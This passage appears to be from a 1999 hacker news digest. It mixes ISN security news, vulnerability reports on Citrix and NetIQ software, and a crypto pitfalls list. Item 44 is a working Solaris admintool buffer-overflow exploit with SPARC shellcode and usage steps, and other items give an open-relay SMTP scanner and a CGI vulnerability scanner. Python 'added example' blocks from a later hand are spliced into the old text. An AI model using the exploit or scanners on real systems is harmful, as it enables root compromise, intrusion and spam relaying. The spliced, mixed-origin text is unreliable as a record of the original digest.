because network administrators either carefully controlled system access
privileges or used patches for known operating system flaws. If expanded
to the whole agency, such simple fixes could protect systems better
because hackers usually will move on to systems with easily exploitable
weaknesses, de Ferrari said.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
39.1 [ISN] Nasa vulnerabilities potentially deadly
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 28 May 1999 01:12:31 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] NASA Vulnerabilities Are Potentially Deadly
http://www.aviary-mag.com/News/Leakage__Part_One/Leakage__Part_Two/leakage__part_two.html
NASA Leakage -- Deadly Leakage
By MIKE HUDACK
135 out of 155 NASA computer systems were found vulnerable by NSA hackers,
reported the General Accounting Office. The GAO, however, didn't say what
was contained on those systems -- they simply called them "mission
critical." The fact is, however, that there's a lot more to these
systems than NASA missions.
"[Some NASA software has] the functionality of serving in the capacity of
a munition's guidance system," said an anonymous source inside NASA. The
weight of such a statement is quite obvious. "The software, however,
would require a certain amount of modification and adaptation to
accommodate the purpose [of nuclear weapons guidance]," the source
continued.
The pattern is clear: earlier this year, the world learned of espionage at
Department of Energy laboratories in which neutron bomb technology was
stolen. At this point, there is no evidence that guidance technology from
NASA computers has been stolen. The fact remains, however, that China has
a dedicated force of computer hackers who do nothing but probe US
Government computers. Their missing NASA would be extraordinarily
unlikely.
The most damning evidence, reported by two anonymous NASA employees,
states that NASA has known about security holes in its Information
Technology facilities for more than a year. According to them, "Security
has consistently been reduced to a reactive role in every part of the
agency. [IT] which has long been identified as vulnerable is not
prohibited." In fact, one went so far as to suggest that it would take a
fundamental change of NASA leadership to create any true security at the
Agency.
Continued at:
http://www.aviary-mag.com/News/Leakage__Part_One/Leakage__Part_Two/leakage__part_two.html
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
40.0 Citrix Winframe client for Linux vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 28 May 1999 12:26:59 -0700
From: David Terrell <dbt@meat.net>
To: BUGTRAQ@netspace.org
Subject: Citrix Winframe client for Linux
[ presumably this holds true for the other unix clients as well, but
all I have is linux to test on ]
The Citrix Winframe linux client (used for accessing Winframe and
Windows NT Server Terminal Edition) has a simple configuration section.
Perhaps too simple.... All configuration information is stored in a
directory /usr/lib/ICAClient/config which is mode 777. This in and
of itself is bad news, since any user on the system can overwrite
configuration data.
The situation is actually much worse than that.
When you start up the actual session manager (wfcmgr) you get a listbox
of configured sessions. The data for this listbox is stored in the mode
777 file /usr/lib/ICAClient/config/appsrv.ini. So there's a single
config file shared between all users. A sample session profile follows:
[WFClient]
Version=1
[ApplicationServers]
broken=
[broken]
WinStationDriver=ICA 3.0
TransportDriver=TCP/IP
DesiredColor=2
Password=0006f6c601930785
Domain=NTDOM
Username=user
Address=hostname
Yep. Passwords are stored in some kind of hash. What that hash is doesn't
really matter since you can just bring up wfcmgr and log in as that user.
Terrible.
I tried mailing both support@citrix.com and security@citrix.com but
neither of these addresses exist.
Workaround? wfcmgr supports the -icaroot parameter, but you basically
need to copy all the files in for it to work. So duplicate the tree in
your home directory, fix permissions, and do wfcmgr -icaroot $HOME/.ica.
Alternatively, don't use it.
Distressing that the company that was "bringing multiuser concurrent logons
to Windows NT" makes such a little effort at understanding multiuser
security.... [further editorialization left to the reader]
--
David Terrell
dbt@meat.net, dbt@nebcorp.com I may or may not be speaking for Nebcorp,
http://wwn.nebcorp.com/~dbt/ but Nebcorp has spoken for you.
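The audit and the per-user workaround from the post, as an added example for this
digest (not Citrix code and not code from the BUGTRAQ post). It assumes only what
the post states: a client root containing config/appsrv.ini, a mode 777 config
directory, and session profiles carrying a Password= entry. The ini text inside
it is a constructed copy of the post's sample profile, and the Python functions
and the scratch directory layout are this example's own.

```python
# Added example for this digest, not Citrix code or code from the BUGTRAQ
# post; only the config/appsrv.ini layout under the client root is the post's.
import configparser
import os
import shutil
import stat
import tempfile

# Constructed copy of the profile format quoted in the post; the Password
# value is the post's example string, not a real credential.
SAMPLE_APPSRV_INI = """[WFClient]
Version=1
[ApplicationServers]
broken=
[broken]
WinStationDriver=ICA 3.0
TransportDriver=TCP/IP
DesiredColor=2
Password=0006f6c601930785
Domain=NTDOM
Username=user
Address=hostname
"""


def world_writable_entries(root):
    """Directories and regular files under root with the other-write bit set
    (the mode 777 config directory and ini file from the post)."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for path in [dirpath] + [os.path.join(dirpath, f) for f in files]:
            mode = os.lstat(path).st_mode
            if not stat.S_ISLNK(mode) and mode & stat.S_IWOTH:
                found.append(path)
    return sorted(found)


def profiles_with_stored_passwords(ini_path):
    """Profiles in appsrv.ini that carry a Password= value; in a shared file
    any local user can replay them through wfcmgr without cracking the hash."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key case as written
    cp.read(ini_path)
    if not cp.has_section("ApplicationServers"):
        return []
    return [n for n in cp["ApplicationServers"]
            if cp.has_section(n) and cp[n].get("Password", "")]


def make_private_icaroot(src, dst):
    """Copy the tree to a per-user directory and strip group/other bits
    (copytree keeps the bad source modes, so chmod explicitly).  Returns
    whatever is still world-writable afterwards; expected empty."""
    old_umask = os.umask(0o077)
    try:
        shutil.copytree(src, dst, symlinks=True)
    finally:
        os.umask(old_umask)
    for dirpath, _dirs, files in os.walk(dst):
        os.chmod(dirpath, 0o700)
        for f in files:
            path = os.path.join(dirpath, f)
            if not os.path.islink(path):
                execbit = os.lstat(path).st_mode & stat.S_IXUSR  # keep binaries runnable
                os.chmod(path, 0o700 if execbit else 0o600)
    return world_writable_entries(dst)


def build_sample_tree(root):
    """Constructed reproduction of the reported state: config/ 777, ini 666."""
    cfg = os.path.join(root, "config")
    os.makedirs(cfg)
    ini = os.path.join(cfg, "appsrv.ini")
    with open(ini, "w") as fh:
        fh.write(SAMPLE_APPSRV_INI)
    os.chmod(cfg, 0o777)
    os.chmod(ini, 0o666)
    return ini


def demo():
    """Audit the reproduced shared tree, then build and re-audit a private copy."""
    base = tempfile.mkdtemp()
    try:
        shared = os.path.join(base, "ICAClient")
        ini = build_sample_tree(shared)
        private = os.path.join(base, "home", ".ica")
        return {
            "shared_world_writable": [os.path.relpath(p, shared)
                                      for p in world_writable_entries(shared)],
            "profiles_with_passwords": profiles_with_stored_passwords(ini),
            "private_world_writable": make_private_icaroot(shared, private),
            "private_ini_exists": os.path.isfile(
                os.path.join(private, "config", "appsrv.ini")),
        }
    finally:
        shutil.rmtree(base)
```

Against the real tree, point world_writable_entries at /usr/lib/ICAClient and, if it
reports anything, build the private copy and start the client with
wfcmgr -icaroot $HOME/.ica as the post says. The copy protects your own profile
only: the shared appsrv.ini, and whatever passwords other users have saved in it,
stays readable by everyone on the box until the package permissions are fixed.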
@HWA
41.0 [ISN] Top 10 candidates for a "duh" list (general sec/crypto)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 28 May 1999 20:16:42 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] Top 10 candidates for a "duh" list (general sec/crypto)
Message-ID: <Pine.SUN.3.96.990528201424.23867K-100000@flatland.dimensional.com>
[Very good run-down on what isn't acceptable crypto. - Jay]
Forwarded From: "Jay D. Dyson" <jdyson@techreports.jpl.nasa.gov>
Originally From: "Arnold G. Reinhold" <reinhold@world.std.com>
Courtesy of Cryptography List.
At 1:36 PM -0400 5/27/99, Kawika Daguio wrote:
What I would like to know from you is whether you and others have been
able to construct a "duh" list of typical, but unacceptable current
practices that can easily be remediated.
Here are my top 10 candidates for a "duh" list:
1. Keys that are too short: Anything less than 80 bits for symmetric
ciphers (128-bits preferred), or 1024 bits for integer-based public key
systems. In particular this precludes use of 56-bit DES. (112-bit 3DES is
fine.)
2. Poor quality random number generation. Random quantities are needed at
many places in the operation of a modern cryptographic security system. If
the source of randomness is weak, the entire system can be compromised.
3. Use of short passwords or weak passphrases to protect private keys or,
worse, using them to generate symmetric keys. Bad passphrase advice
abounds. For example, both Netscape and Microsoft advise using short
passwords to protect private keys stored by their browsers. The simple fix
is to use randomly generated passphrases of sufficient length. See
http://www.hayom.com/diceware.html.
4. Re-use of the same key with a stream cipher. I have seen this done many
times with RC4. Even Microsoft appears to have gotten this wrong with
their VPN (I do not know if it has been fixed). There are simple
techniques to avoid this problem but they are often ignored. See
http://ciphersaber.gurus.com for one method. The potential for slipping up
in stream cipher implementation makes a strong case for using modern block
ciphers wherever possible.
5. Using systems based on encryption techniques that have not been
publicly disclosed and reviewed. There are more than enough ciphers and
public key systems out there that have undergone public scrutiny. Many of
the best are now in the public domain: 3DES, Blowfish, Skipjack, Arcfour,
D-H, DSA. Others, e.g. RSA, IDEA can be licensed.
6. Ignoring physical security requirements for high value keys. In
particular, no secret key is safe if it is used on a personal computer to
which someone who is not trusted can gain physical access.
7. Lack of thorough configuration management for cryptographic software.
The best software in the world won't protect you if you cannot guarantee
that the version you approved is the version being executed.
8. Poor human interface design. Cryptographic systems that are too hard to
use will be ignored, sabotaged or bypassed. Training helps, but cannot
overcome a bad design.
9. Failure to motivate key employees. Action or inaction, deliberate or
inadvertent, by trusted individuals can render any security system worse
than worthless. David Kahn once commented that no nation's communications
are safe as long as their code clerks are at the bottom of the pay scale.
10. Listening to salesmen. Any company that is selling cryptographic
products has a good story for why the holes in their product really do not
matter. Make sure the system you deploy is reviewed by independent
experts.
Arnold Reinhold
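Item 4 above, keystream reuse with RC4 and the per-message IV fix, worked through
as an added example for this digest (not code from the list post or from
CipherSaber). The RC4 implementation is the textbook KSA/PRGA; the key and the
two messages are constructed sample data. The IV handling copies the CipherSaber-1
idea the post points to (a fresh 10-byte IV appended to the key and sent in clear
ahead of the ciphertext). RC4 is used only because the post names it: it is a broken
cipher, and key-plus-IV concatenation has its own related-key problems, which is
exactly why the post ends item 4 by recommending a modern block cipher instead.

```python
# Added example for this digest, not code from the list post.  RC4 appears
# only because the post discusses it; do not use it for anything real.
import secrets

IV_LEN = 10  # CipherSaber-1 appends a 10-byte IV to the user key


def rc4_keystream(key):
    """RC4 key scheduling followed by the PRGA, yielding keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        yield s[(s[i] + s[j]) & 0xFF]


def rc4_crypt(key, data):
    """XOR data with the keystream; encryption and decryption are identical."""
    ks = rc4_keystream(key)
    return bytes(b ^ next(ks) for b in data)


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def reuse_leak(c1, c2):
    """Two ciphertexts under the same keystream: c1 ^ c2 == m1 ^ m2.  The
    keystream cancels, so no key material is needed to compute this."""
    return xor_bytes(c1, c2)


def recover_with_crib(c1, c2, known_m1):
    """With m1 known (or guessed), m2 falls out byte for byte."""
    return xor_bytes(reuse_leak(c1, c2), known_m1)


def encrypt_with_iv(key, msg):
    """CipherSaber-1 style: fresh random IV appended to the key and sent in
    clear in front of the ciphertext, so every message has its own keystream."""
    iv = secrets.token_bytes(IV_LEN)
    return iv + rc4_crypt(key + iv, msg)


def decrypt_with_iv(key, blob):
    iv, ct = blob[:IV_LEN], blob[IV_LEN:]
    return rc4_crypt(key + iv, ct)


def demo():
    """Show the leak with a reused key, then show the IV scheme closing it."""
    key = b"shared-key"          # constructed
    m1 = b"ATTACK AT DAWN"       # constructed
    m2 = b"RETREAT AT DUSK"      # constructed
    c1, c2 = rc4_crypt(key, m1), rc4_crypt(key, m2)            # same key, no IV
    e1, e2 = encrypt_with_iv(key, m1), encrypt_with_iv(key, m2)
    return {
        "leak_is_plaintext_xor": reuse_leak(c1, c2) == xor_bytes(m1, m2),
        "recovered_m2": recover_with_crib(c1, c2, m1),
        "fixed_leak_is_plaintext_xor":
            reuse_leak(e1[IV_LEN:], e2[IV_LEN:]) == xor_bytes(m1, m2),
        "fixed_roundtrip": decrypt_with_iv(key, e1) == m1
                           and decrypt_with_iv(key, e2) == m2,
    }
```

The point of the crib step is that the attacker never touches the key: one known or
guessable message (a protocol header, a boilerplate greeting) reveals the other
message under the same keystream. Any stream cipher, including a block cipher in
CTR mode, fails the same way when a (key, nonce) pair is reused; the IV only helps
if it is never repeated for the same key.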
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
42.0 Seeing invisible fields and avoiding them...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by Twstdpair (Source: MSNBC)
See invisible fields - and avoid them
The Micro Alert Alarm for detecting
radio/microwaves
May 28 - Earlier this week, a news story I read troubled me greatly. It told about a
European study that linked cellular phone use to an increased incidence of brain
tumors. For me, and millions of other cell phone junkies, this is a very scary thought.
If the study is true, I could stop using my phones to minimize risks, or find out just
how much "pollution" my devices are creating. THAT'S WHERE THE PEOPLE from AlphaLab Inc.
come in. Someone there read a column I did on a cell phone antenna add-on that claimed
to take the signal and move it away from your head. AlphaLab's David told me the company
made a tiny device that could detect what your phone was really doing. I jumped at
the chance to play with one.
The Micro Alert Alarm is just what it says it is. It's a matchbox-sized device (2.25 inches
by 1.6 inches by 0.75 inches) that will (and I quote) "find what's emitting radio or
microwaves, whether in hidden locations or in plain sight." The alarm puts forth a loud
(annoying) beep when radio waves stronger than the level you select are present. If you
move closer to the source of the RF-emitting device, the beeps will ultimately become a
solid tone (more annoying). As you move away from the source, the beeping will stop
altogether (thankfully).
The alarm runs on a tiny battery that lasts three years or so. At its highest
sensitivity, it should detect a typical cellular phone tower a half-mile away. Or an
analog cellular phone 40 feet away. Or a digital phone at 20 feet. Or a microwave oven
that's in use 10 to 50 feet away. To send the Micro Alert Alarm into nearly constant fits,
unscrew the back and open one side. The sensitivity goes off the chart. In that mode, you
can see if someone has bugged a room (among other things). The price for this little
marvel? $81.50, plus shipping and handling.
Does it work? You bet. Actually, sometimes it works too well. The most important part of
working this device is setting it to your location. It can be very sensitive. I really
couldn't test it at MSNBC. Way too many TV monitors, computer monitors and all sorts of
broadcasting stuff around. And I couldn't really test it at home in Lower Manhattan. An
old friend, Joe Sand, while helping me install an antenna on my roof, told me I lived
so close to the broadcast antennas on the World Trade Center, that if someone made
sunglasses that detected radio waves, it would look as if I lived inside a tornado. He
was right. The alarm was nearly impossible to adjust at the "normal" setting. And it
never stopped beeping when set on "high" sensitivity. I did have better luck out at the
Eastern Long Island test center. There I was able to adjust everything to my liking. I
found that the Micro Alert Alarm didn't like microwave ovens or TV sets or computer
monitors - all from a few feet away. Cellular phones (one-third-watt output) set off the
beeping from about three to five feet away and my Blackberry beeper (2 watts of
transmitting power) did the same from about one to two feet away. Not what AlphaLab
claims, but who knows if I ever really maximized all the settings. Is it worth it? That
depends. If you're the paranoid type, buy one today. I couldn't reference just how
scientifically accurate it is, but under favorable conditions it did detect
those invisible radio waves that could be dangerous to our health. Might turn out to be a
good gift for someone with a pacemaker. On the other hand, a Micro Alert Alarm is said to
find surveillance "bugs," detect police radar, leaky microwave ovens, fluorescent
lighting, electric typewriters and copy machines! Finally, you can take AlphaLab's
advice and switch on your Micro Alert Alarm and put it in your pocket when you go out.
If someone switches on a cell phone and sets off your alarm, you can kindly ask them
to move away and stop polluting your personal space. Cool!
@HWA
43.0 RelayCheck v1.0 scan for smtp servers that will relay mail.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm Security http://www.genocide2600.com/~tattooman/new.shtml
#!/usr/bin/perl
##############################################
# RelayCheck v1.0
# Written By: Epicurus (epicurus@wilter.com)
#
# Purpose: To scan a list of SMTP servers to
# find servers that will relay e-mail. There
# are many reasons why one might need such a
# list of SMTP servers.
#
# Usage:
# Create a list of hosts which you want to
# scan. One host per line. Then run this
# script.
##############################################
use Socket;
print "RelayCheck v1.0\n";
print "Written By: Epicurus (epicurus\@wilter.com)\n\n";
print "Host List: ";
chomp($host_list=<STDIN>);
print "HELO Domain: ";
chomp($helo_domain=<STDIN>);
print "Attempt From: ";
chomp($from=<STDIN>);
print "Attempt To: ";
chomp($to=<STDIN>);
print "Log Session?(y/n)";
$yn=<STDIN>;
if($yn =~ /y/i)
{
$log = 1;
$logfile="relay.log";
print "Log File [$logfile]: ";
$file=<STDIN>;
chop($file) if $file =~ /\n$/;
if($file ne "")
{
$logfile=$file;
}
open(LOG,">>$logfile") || die("Unable to write to $logfile!");
print LOG "RelayCheck Scan:\n\n";
}
##############################################
$helo_string = "HELO $helo_domain\r\n";
$mail_from = "MAIL FROM: <$from>\r\n";
$rcpt_to = "RCPT TO: <$to>\r\n";
$port = 25;
$found=0;
$i=0;
open(HOSTS,"$host_list") || die $!;
while(<HOSTS>)
{
chop($_) if $_ =~ /\n$/;
$remote=$_;
$print_remote = $remote;
$print_remote .= "." while(length($print_remote) < 38);
$print_remote .= ": ";
print "$print_remote";
print LOG "$print_remote" if($log==1);
&send_mail;
$i++;
}
close(HOSTS);
print "\nFinished Scanning. $found out of $i hosts will relay.\n\n";
print LOG "\nFinished Scanning. $found out of $i hosts will relay.\n\n" if($log==1);
close(LOG);
sub send_mail
{
if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); }
die("No port specified.") unless $port;
$iaddr = inet_aton($remote) || die("Failed to find host: $remote");
$paddr = sockaddr_in($port, $iaddr);
$proto = getprotobyname('tcp');
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket: $!");
connect(SOCK, $paddr) || die("Unable to connect: $!");
$smtp=<SOCK>;
if($smtp =~ /^220 /)
{
send(SOCK,$helo_string,0);
}
$smtp=<SOCK>;
if($smtp =~ /^250 /)
{
send(SOCK,$mail_from,0);
}
$smtp=<SOCK>;
if($smtp =~ /^250 /)
{
send(SOCK,$rcpt_to,0);
}
$smtp=<SOCK>;
if($smtp =~ /^250 /)
{
$found++;
print "relaying allowed\n";
print LOG "relaying allowed\n" if($log==1);
}
else
{
print "no relaying\n";
print LOG "no relaying\n" if($log==1);
}
send(SOCK,"QUIT\r\n",0);
close(SOCK);
}
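An added example, not part of the RelayCheck script above: a Python model of the relay rule a correctly configured mail server applies at RCPT TO, plus a toy responder so the script's HELO / MAIL FROM / RCPT TO exchange can be replayed against it offline. The local domain, trusted IP prefix, host names and reply texts are constructed for the illustration.

```python
import re

# Constructed policy for a hypothetical server: the domain it delivers for
# locally and the client prefix its operator allows to relay outbound mail.
LOCAL_DOMAINS = {"example.org"}
TRUSTED_CLIENT_PREFIXES = ("192.0.2.",)

ADDR_RE = re.compile(r"<([^>]*)>")


def relay_allowed(rcpt, client_ip, local_domains=LOCAL_DOMAINS,
                  trusted_prefixes=TRUSTED_CLIENT_PREFIXES):
    """The decision a closed (non-relaying) MTA makes at RCPT TO.

    Mail for a domain this host delivers locally is always accepted; that is
    delivery, not relaying.  Mail for any other domain is relayed only for
    clients the operator trusts (a constructed IP prefix here; real MTAs use
    SMTP AUTH or an explicit relay list).
    """
    domain = rcpt.rsplit("@", 1)[-1].lower()
    if domain in local_domains:
        return True
    return client_ip.startswith(trusted_prefixes)


class ToySmtpServer:
    """Just enough of an SMTP responder to answer the four commands the
    RelayCheck script sends.  open_relay=True reproduces the misconfiguration
    the script looks for: every RCPT TO is accepted."""

    def __init__(self, client_ip, open_relay=False):
        self.client_ip = client_ip
        self.open_relay = open_relay
        self.sender = None

    def banner(self):
        return "220 mail.example.org ESMTP ready\r\n"

    def handle(self, line):
        cmd = line.strip()
        upper = cmd.upper()
        if upper.startswith("HELO "):
            return "250 mail.example.org\r\n"
        if upper.startswith("MAIL FROM:"):
            m = ADDR_RE.search(cmd)
            self.sender = m.group(1) if m else None
            return "250 2.1.0 sender ok\r\n"
        if upper.startswith("RCPT TO:"):
            if self.sender is None:
                return "503 5.5.1 need MAIL FROM first\r\n"
            m = ADDR_RE.search(cmd)
            rcpt = m.group(1) if m else ""
            if self.open_relay or relay_allowed(rcpt, self.client_ip):
                return "250 2.1.5 recipient ok\r\n"
            return "550 5.7.1 relaying denied\r\n"
        if upper == "QUIT":
            return "221 2.0.0 bye\r\n"
        return "500 5.5.1 command unrecognized\r\n"


def relay_check(server, helo_domain, mail_from, rcpt_to):
    """Replay the script's exchange against `server`.  Like the script, each
    command is only sent if the previous reply was accepted, and a 250 to
    RCPT TO is what counts as "relaying allowed"."""
    transcript = [server.banner()]
    for cmd in (f"HELO {helo_domain}",
                f"MAIL FROM: <{mail_from}>",
                f"RCPT TO: <{rcpt_to}>"):
        if not transcript[-1].startswith(("220 ", "250 ")):
            break
        transcript.append(server.handle(cmd))
    server.handle("QUIT")
    return transcript[-1].startswith("250 ")
```

A recipient in a domain the server delivers for gets 250 even on a closed server, so the "Attempt To" address must lie in a domain the tested host does not handle or the script reports a false positive.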
@HWA
44.0 Admintool exploit for Solaris (Updated) by Shadow Penguin Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm Security http://www.genocide2600.com/~tattooman/new.shtml
/*=============================================================================
admintool Overflow Exploits( Solaris2.6 and 7 for Sparc Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
[usage]
% setenv DISPLAY=yourdisplay:0.0
% gcc ex_admintool.c (This example program)
% a.out
( [Browse] -> [Software] -> [Edit] -> [Add] -> [Harddisk]
-> Directory: /tmp -> [Ok] )
#
In /tmp/EXP directory, the temp files are made, please remove it.
=============================================================================
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/utsname.h>
#define ADJUST1 2
#define ADJUST2 1
#define BUFSIZE1 1000
#define BUFSIZE2 800
#define OFFSET 3600
#define OFFSET2 400
#define PKGDIR "mkdir /tmp/EXP"
#define PKGINFO "/tmp/EXP/pkginfo"
#define PKGMAP "/tmp/EXP/pkgmap"
#define NOP 0xa61cc013
char exploit_code[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
"\x94\x10\x20\x10\x94\x22\xa0\x10"
"\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;
unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
unsigned long ret_adr;
static char x[500000];
FILE *fp;
int i,vofs=0;
struct utsname name;
main()
{
uname(&name);
if (strcmp(name.release,"5.7")==0) vofs=-904;
system(PKGDIR);
putenv("LANG=");
if ((fp=fopen(PKGMAP,"wb"))==NULL){
printf("Can not write '%s'\n",PKGMAP);
exit(1);
}
fclose(fp);
if ((fp=fopen(PKGINFO,"wb"))==NULL){
printf("Can not write '%s'\n",PKGINFO);
exit(1);
}
fprintf(fp,"PKG=");
ret_adr=get_sp()-OFFSET+vofs;
while ((ret_adr & 0xff000000) == 0 ||
(ret_adr & 0x00ff0000) == 0 ||
(ret_adr & 0x0000ff00) == 0 ||
(ret_adr & 0x000000ff) == 0)
ret_adr += 4;
printf("Jumping address = %lx\n",ret_adr);
memset(x,'a',4);
for (i = ADJUST1; i < 1000; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >>8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
x[BUFSIZE1]=0;
fputs(x,fp);
fprintf(fp,"\n");
fprintf(fp,"NAME=");
memset(x,'a',4);
for (i = ADJUST2; i < BUFSIZE2; i+=4){
x[i+3]=NOP & 0xff;
x[i+2]=(NOP >> 8 ) &0xff;
x[i+1]=(NOP >> 16 ) &0xff;
x[i+0]=(NOP >> 24 ) &0xff;
}
for (i=0; i<strlen(exploit_code); i++)
x[i+ADJUST2+OFFSET2]=exploit_code[i];
x[BUFSIZE2]=0;
fputs(x,fp);
fprintf(fp,"\n");
fprintf(fp,"VERSION=1.00\n");
fprintf(fp,"ARCH=sparc\n");
fprintf(fp,"CLASSES=none\n");
fprintf(fp,"CATEGORY=application\n");
fprintf(fp,"PSTAMP=990721\n");
fprintf(fp,"BASEDIR=/\n");
fclose(fp);
system("admintool");
}
@HWA
45.0 AppManager 2.0 for NT from NetIQ displays passwords in cleartext
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm Security http://www.genocide2600.com/~tattooman/new.shtml
AppManager 2.0 from NetIQ displays passwords in clear text!
AppManager is a product which enables an enterprise to monitor the performance and
availability of Windows NT server services such as Exchange, SQL, etc. It does this
via an agent on the target machine which reports back to a console. The agents monitor
for things like low disk space, misbehaving services, and so on. Like most products that
follow a manager/agent architecture, the agents must use an account with Administrator
privileges in order to do their job. The problem is that when the authentication occurs,
the userid and password are passed in clear text, meaning that anyone with a sniffer can
read it as it goes across the wire.
The other problem is that when someone with access to the AppManager console goes to look
at a job, all he or she must do is right-click on the job, select Properties, select the
View tab, and voila! The userid and password that the job is using is right there for all
to see. With version 3.0 they have replaced the password with asterisks, but the company
conceded that if someone were to copy the asterisks and paste them into a text file then the
password would be displayed instead of the asterisks! More security through obscurity.
The only fix so far is for an AppManager administrator to go into the Properties and
manually backspace over the password to remove it. Once this is done it will not appear
again on any of the consoles. However, if an "agent installation" job is run, the password
WILL be displayed in Properties, but only for the duration of the install, which is usually
between ten and fifteen minutes. There is currently no way to prevent this.
According to the company this is a "known issue." After some more discussion I found that
they have known about this for two years, yet apparently have not done anything to rectify
it. They said that encrypting the authentication sequence traffic is difficult to do
which is one of the reasons why they haven't fixed it yet. If their programmers can't
figure out in two years how to encrypt traffic then I think another product should be
chosen.
-- Anonymous
@HWA
46.0 Cgichck99 ported to Rebol from Su1d Sh3ll's .c code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
REBOL [
Title: "CGI Check 99"
Date: 27-May-1999
Author: "deepquest 98% by loser"
Comment: "respect and source from loser"
File: %cgi-check99.r
Email: deepquest@netscape.net
Purpose: { Popular CGI scanner ported and improved to REBOL. }
]
secure none
print "CGI Scanner. Ported by loser improved by deepquest."
prin "Site to scan: "
site: input
a: exists? join http:// [ site "/cgi-bin/rwwwshell.pl " ]
if a == yes [ print "THC - Backdoor" ]
b: exists? join http:// [ site "/cgi-bin/phf " ]
if b == yes [ print "PHF" ]
c: exists? join http:// [ site "/cgi-bin/Count.cgi " ]
if c == yes [ print "Count.cgi" ]
d: exists? join http:// [ site "/cgi-bin/test.cgi " ]
if d == yes [ print "test-cgi" ]
e: exists? join http:// [ site "/cgi-bin/nph-test-cgi " ]
if e == yes [ print "nhp-test-cgi " ]
f: exists? join http:// [ site "/cgi-bin/nph-publish " ]
if f == yes [ print "nph-publish" ]
g: exists? join http:// [ site "/cgi-bin/php.cgi " ]
if g == yes [ print "PHP" ]
h: exists? join http:// [ site "/cgi-bin/handler " ]
if h == yes [ print "handler" ]
i: exists? join http:// [ site "/cgi-bin/webgais " ]
if i == yes [ print "webgais" ]
j: exists? join http:// [ site "/cgi-bin/websendmail " ]
if j == yes [ print "websendmail" ]
k: exists? join http:// [ site "/cgi-bin/webdist.cgi " ]
if k == yes [ print "webdist.cgi" ]
l: exists? join http:// [ site "/cgi-bin/faxsurvey " ]
if l == yes [ print "faxsurvey" ]
m: exists? join http:// [ site "/cgi-bin/htmlscript " ]
if m == yes [ print "htmlscript" ]
n: exists? join http:// [ site "/cgi-bin/pfdisplay.cgi" ]
if n == yes [ print "pfdisplay" ]
o: exists? join http:// [ site "/cgi-bin/perl.exe" ]
if o == yes [ print "perl.exe" ]
p: exists? join http:// [ site "/cgi-bin/wwwboard.pl" ]
if p == yes [ print "wwwboard.pl" ]
q: exists? join http:// [ site "/cgi-bin/www-sql " ]
if q == yes [ print "www-sql" ]
r: exists? join http:// [ site "/cgi-bin/view-source " ]
if r == yes [ print "view-source" ]
s: exists? join http:// [ site "/cgi-bin/campas " ]
if s == yes [ print "campas" ]
t: exists? join http:// [ site "/cgi-bin/aglimpse " ]
if t == yes [ print "aglimpse" ]
u: exists? join http:// [ site "/cgi-bin/glimpse " ]
if u == yes [ print "glimpse" ]
v: exists? join http:// [ site "/cgi-bin/man.sh " ]
if v == yes [ print "man.sh" ]
w: exists? join http:// [ site "/cgi-bin/AT-admin.cgi " ]
if w == yes [ print "AT-admin.cgi" ]
x: exists? join http:// [ site "/cgi-bin/filemail.pl " ]
if x == yes [ print "filemail.pl" ]
y: exists? join http:// [ site "/cgi-bin/maillist.pl " ]
if y == yes [ print "maillist.pl" ]
z: exists? join http:// [ site "/cgi-bin/jj " ]
if z == yes [ print "jj" ]
aa: exists? join http:// [ site "/cgi-bin/info2www " ]
if aa == yes [ print "info2www" ]
bb: exists? join http:// [ site "/cgi-bin/files.pl " ]
if bb == yes [ print "files.pl" ]
cc: exists? join http:// [ site "/cgi-bin/finger " ]
if cc == yes [ print "finger" ]
dd: exists? join http:// [ site "/cgi-bin/bnbform.cgi " ]
